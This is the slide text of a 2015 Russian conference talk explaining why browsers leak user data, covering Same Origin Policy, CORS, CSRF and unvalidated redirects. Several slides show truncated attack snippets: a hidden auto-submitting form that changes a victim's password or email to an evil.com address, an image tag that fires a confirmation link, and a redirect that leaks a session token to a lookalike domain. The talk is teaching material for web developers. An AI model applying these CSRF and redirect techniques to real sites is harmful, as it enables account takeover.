Доклад на http://2015.happydev.ru

1. ПОЧЕМУБРАУЗЕРЫ
ОТДАЮТВАШИ
ДАННЫЕХАКЕРАМ?
Артем Зиненко
<art@hackerdom.ru>

2. XSS
CSRF
UNVALIDATED REDIRECT
CLICKJACKING

4. ПЛАН

6. GET /index.html

7. GET /index.html

8. GET /index.html
GET /image.png

9. GET /index.html
GET /image.png

10. CROSS DOMAIN
REQUESTS

11. site.com

12. site.com
GET /emails gmail.com

13. site.com
GET /emails gmail.com

14. Same Origin
Policy

15. protocol://host:port

16. https://site.com
http://site.com
https://a.site.com
https://site.com:9090

17. CROSS ORIGIN RESOURCE SHARING

18. GET
HEAD
POST
METHODS

19. Accept
Accept-Language
Content-Language
Content-Type
HEADERS

20. application/x-www-
form-urlencoded
multipart/form-
data
text/plain
CONTENT-TYPE

21. var r = new
XMLHttpRequest();
r.open('GET',
‘http://site2.com’,
true);
r.send();

22. GET / HTTP/1.1
Host: site2.com
Origin:
http://site1.com/

23. HTTP/1.1 200 OK
Access-Control-
Allow-Origin:
http://site1.com
[Data]

24. var r = new
XMLHttpRequest();
r.open('GET', ‘http://
site2.com’, true);
r.withCredentials =
true;
r.send();

25. GET / HTTP/1.1
Host: site2.com
Origin:
http://site1.com/
Cookie: token=ab7…

26. HTTP/1.1 200 OK
Access-Control-Allow-
Origin: http://
site1.com
Access-Control-Allow-
Credentials: true
[Data]

27. PREFLIGHTED REQUESTS

28. var r = new XMLHttpRequest();
r.open('POST', ‘http://
site2.com’, true);
r.setRequestHeader(‘Content-
Type’,'application/json');
r.setRequestHeader('X-HEADER',
'lalala');
r.send(data);

29. OPTIONS / HTTP/1.1
Host: site2.com
Origin:
http://site1.com/
Access-Control-Request-
Method: POST
Access-Control-Request-
Headers: X-HEADER

30. HTTP/1.1 200 OK
Access-Control-Allow-Origin:
http://site1.com
Access-Control-Allow-
Methods: POST, GET, OPTIONS
Access-Control-Allow-
Headers: X-HEADER

31. POST / HTTP/1.1
Host: site2.com
Origin: http://site1.com/
X-HEADER: lalala
Content-Type:
application/json
[Data]

32. HTTP/1.1 200 OK
Access-Control-
Allow-Origin:
http://site1.com
[Data]

34. Cross-origin reads
var r = new
XMLHttpRequest();
r.open('GET', ‘http://
site2.com’, true);
r.withCredentials = true;
r.send();

35. Cross-origin writes
var c = new XMLHttpRequest();
c.withCredentials = true;
c.open("POST", ...);
c.setRequestHeader("Content-
Type", “...”);
c.send(...);

36. Cross-origin embedding
$(‘…’).append(
‘<img src=“…”>’
);

37. Bad CORS

38. Access-Control-
Allow-Origin: *
Access-Control-
Allow-
Credentials: true

39. HACKED

40. CHANGE PASSWORD

42. POST /profile
name: art
password:78330…
retypedPassword:2c84…

45. GET evil.com

46. GET evil.com

47. <form method=“POST”
action=“http://
service.com/profile”>
<input type=“hidden” name=“name” value=“email@evil.com” />
<input type=“hidden” name=“password” value=“78330…” />
<input type=“hidden” name=“retypedPassword” value=“2c84…” />
</form>

48. <form method=“POST” action=“http://service.com/profile”>
<input type=“hidden”
name=“name” value=“art”/>
<input type=“hidden”
name=“password”
value=“78330…”/>
<input type=“hidden”
name=“retypedPassword”
value=“2c84…”/>
</form>

49. <script>
window.onload =
function(){
…
form.submit();
}
</script>

50. POST /profile
name, password
GET evil.com

51. HACKED

52. CrossSiteRequest
FORGERY

53. CHANGE EMAIL

58. POST /user
email: art@evil.com

59. PASSWORD???

60. <img
src=“https://...
/confirm?
code=67a50…” />

61. HACKED

62. UNVALIDATED REDIRECT

64. https://
site.com/login?
back=https%3A%2F
%2Fqqq.site.com
SUBDOMAIN

65. HTTP/1.1 302 Found
Location: https://
qqq.site.com/
Set-Cookie:token=djnD…;
domain=.site.com;

66. https://
site.com/login?
back=https%3A%2F
%2Fqqq-site.com
ANOTHER DOMAIN

67. HTTP/1.1 302 Found
Location: https://
qqq-site.com/?
token=djnD…

68. HACKED

70. https://speakerdeck.com
/ar7z1/happydev-2015